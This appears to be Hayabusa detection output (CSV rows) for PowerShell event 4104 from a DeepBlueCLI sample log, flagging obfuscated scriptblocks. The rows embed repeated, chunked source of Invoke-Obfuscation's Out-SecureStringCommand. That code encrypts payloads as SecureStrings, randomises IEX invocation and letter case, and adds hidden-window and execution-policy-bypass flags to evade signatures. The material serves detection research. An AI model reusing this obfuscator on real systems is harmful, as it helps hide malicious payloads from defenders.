-Input @(0,1)) + $PSCredential + ' '*(Get-Random -Input @(0,1)) + ""' '"" + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""'$SecureStringText'"" + 
' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + $GetNetworkCredential # Select random option from above. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out (and not sure that I ever will), these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Select random option from above. $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. 
If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBou",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.271 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-SecureStringCommand { <# .SYNOPSIS Generates AES-encrypted SecureString object out of three possible syntaxes for a PowerShell command or script. Optionally it adds command line output to final command. 
Invoke-Obfuscation Function: Out-SecureStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-SecureStringCommand encrypts an input PowerShell scriptblock or path as a SecureString object. It randomly selects between three different syntaxes for accomplishing this. The purpose is to highlight to the Blue Team that there are more novel ways to encode/encrypt a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfi -NonIn "" IEX( ([Runtime.InteropServices.Marshal]::PtrToStringUni( [Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode( $('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' |ConvertTo-SecureString -Key 241,131,91,52,14,165,71,51,19,86,1,104,87,220,235,62) ))) )"" C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru (New-Object Management.Automation.PSCredential ' ', ( '76492d1116743f0423413b16050a5345MgB8AEUAcQBKAHkAegBqAHUAQwBNAC8AeABPAHUAbgBlADAAUABMAHQARQAyAGcAPQA9AHwAMgBlAGEANQBiADMAMAA0ADMANQBkAGIAMQA2AGUAYwA2ADIANwAyADEANAA5ADUAYwAyADkAOAAzADUAZAAwADcANAAwADQAOQA0AGQAZQAwADUAYwBjADUAZgAwADYAYgA0AGIAYQA0AGYANwAxADUAMwA1AGUANQAxAGMANwBiADAANgA3ADgAOABmAGQAYwBjADYAMAA4AGYAZQAyADEAZAAyADQAMgBkAGYAYwBmADkAZQA5ADkAMwBmAGMAZAAzADgAOQAwADEANQBhADcANAA5AGUANQBiAGMAOAA2ADYAOAAxAGYAMwAxAGYAMwA4AGQANAA0ADAAYgA3ADUAMwBkADcAMQAwADAANABlAGIAOQAxAGIAOQAxADcAZgBjAGEANAA4ADUAOQBlADUAOAA1AGEANwBjADUAYQAwADgAOAAyAGEAMAAzADQAMQA3ADYAMwA0AGUAMwBiADUAZgA3AGMAMwA5AGQAZQAyADkAMgAxADAAMgA5ADUAMwBmADMAOAA5ADQAYwAyAGUANwA5AGMAMgA5ADEAMAAwAGEAMgAyAGQANQA4ADAAZQBiAGMAZAA1ADkAMgBlAGQAOAAyADIAZAA3ADQAYQBmADIANwAwADQAMQAzADQANgAxADQAMwA5ADgANQBlADIANQA2ADEAMwBiAGUAMwBhAGMAMQAwADIAYQBjAGMAYgA5AGUAYQBjAGQAZQAyADYAYgAyADkAZABjAGEAMAA4ADIANAA1AGMAOAAzADgAZgAyAGEAMABlAGYANAAwAGEAMgAyADgANQBlADkAMgAyAGEANgA0ADQANwBlADAAYgA0ADkAMgBkAGMANgAwAGMANwA3ADUAZABhADkAMgA1ADAAYgA0ADgAYQBmAGIAMQBjADEAMgA2ADEAZgA0ADkANgA4AGYAMQA0ADkAMAA0AGYANwBjAGMAYQBiAGQAZQA4ADIAMAA1AGUAZgA4ADMAZQAwAGMAYQBlADQAMgBkAGIAOQBkADUANwAzADQANwAyAGIAYwAxADQAYwBiAGEAZAA2AGYAZQAzADUAYgAxADgAYgBhADcANQAyADkAMAAwADcAMAA0ADQANgBlAGMAYQA1ADQAMQBhAGYAYgAzADYANwBjAGIAZgAyAGEAYgBkADgAZAAwAGEAZgBmADYAMQA2AGIAMAA1AGIANQA=' |ConvertTo-SecureString -Key 205,39,9,9,104,139,104,94,252,20,93,132,29,171,56,2 
)).GetNetworkCredential().Password | Invoke-Expression .NOTES The size limit for a single SecureString object input is 65,536 characters. However, this will consume significant resources on the target system when decoding a SecureString object of this size (50% CPU and ~30 seconds on several test VMs). For larger payloads I would recommend chunking your payload and encoding/encrypting each piece separately and then reassembling each decoded/decrypted piece during runtime. I have a POC that does this and will be releasing a STAGING set of functions soon to accomplish this very task. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to a SecureString object. $SecureString = ConvertTo-SecureString $ScriptString -AsPlainText -Force # Randomly select the key length. Supported key lengths for SecureString (AES) are 16, 24 and 32. $KeyLength = Get-Random @(16,24,32) # Randomly select the key value and how it will be formatted. 
Switch(Get-Random -Minimum 1 -Maximum 3) { 1 { # Generate random key of length $KeyLength. $SecureStringKey = @() For($i=0; $i -lt $KeyLength; $i++) { $SecureStringKey += Get-Random -Minimum 0 -Maximum 256 } $SecureStringKeyStr = $SecureStringKey -Join ',' } 2 { # Generate sequential key of length $KeyLength with random array bounds. # To save space use shorthand array notation in final command with $SecureStringKeyStr. $LowerBound = (Get-Random -Minimum 0 -Maximum (256-$KeyLength)) $UpperBound = $LowerBound + ($KeyLength - 1) Switch(Get-Random @('Ascending','Descending')) { 'Ascending' {$SecureStringKey = ($LowerBound..$UpperBound); $SecureStringKeyStr = ""($LowerBound..$UpperBound)""} 'Descending' {$SecureStringKey = ($UpperBound..$LowerBound); $SecureStringKeyStr = ""($UpperBound..$LowerBound)""} default {Write-Error ""An invalid array ordering option was generated for switch block.""; Exit;} } } default {Write-Error ""An invalid random number was generated for switch block.""; Exit;} } # Convert SecureString object to text that we can load on target system. $SecureStringText = $SecureString | ConvertFrom-SecureString -Key $SecureStringKey # Generate random syntax for -Key command argument. $Key = (Get-Random -Input @(' -Key ',' -Ke ',' -K ')) # Randomly choose member invocation syntax. 
"".Invoke"" syntax below is not necessary for PS 3.0+ $PtrToStringAuto = (Get-Random -Input @('PtrToStringAuto',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(3,5)) + '].Name).Invoke'))) $PtrToStringUni = (Get-Random -Input @('PtrToStringUni' ,('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(2,4)) + '].Name).Invoke'))) $PtrToStringAnsi = (Get-Random -Input @('PtrToStringAnsi',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(0,1)) + '].Name).Invoke'))) # Below four notations are commented out as they only work on PS 3.0+ #$PtrToStringBSTR = (Get-Random -Input @('PtrToStringBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[142].Name).Invoke')) #$SecureStringToBSTR = (Get-Random -Input @('SecureStringToBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[162].Name)')) #$SecureStringToGlobalAllocUnicode = (Get-Random -Input @('SecureStringToGlobalAllocUnicode','([Runtime.InteropServices.Marshal].GetMembers()[169].Name)')) #$SecureStringToGlobalAllocAnsi = (Get-Random -Input @('SecureStringToGlobalAllocAnsi' ,'([Runtime.InteropServices.Marshal].GetMembers()[168].Name)')) # Randomize the case versions for necessary operations. 
$PtrToStringAuto = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAuto("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringUni = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringUni("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringAnsi = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAnsi("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::PtrToStringBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocUnicode = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocAnsi = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocAnsi(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $NewObject = ([Char[]]'New-Object ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PSCredential = ([Char[]]'Management.Automation.PSCredential ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ConvertToSecureString = ([Char[]]'ConvertTo-SecureString' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input 
@(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Key = ([Char[]]$Key | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $GetNetworkCredential = ([Char[]]').GetNetworkCredential().Password' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Set syntax for running ConvertTo-SecureString cmdlet. $ConvertToSecureStringSyntax = '$(' + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate the code that will decrypt and execute the payload and randomly select one. $NewScriptArray = @() $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAuto + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringUni + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocUnicode + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAnsi + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocAnsi + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringBSTR + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $NewObject + ' '*(Get-Random -Input @(0,1)) + $PSCredential + ' '*(Get-Random -Input @(0,1)) + ""' '"" + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""'$SecureStringText'"" + 
' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + $GetNetworkCredential # Select random option from above. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out (and not sure that I ever will), these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Select random option from above. $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. 
If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBou",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.271 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ndParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.271 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ndParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
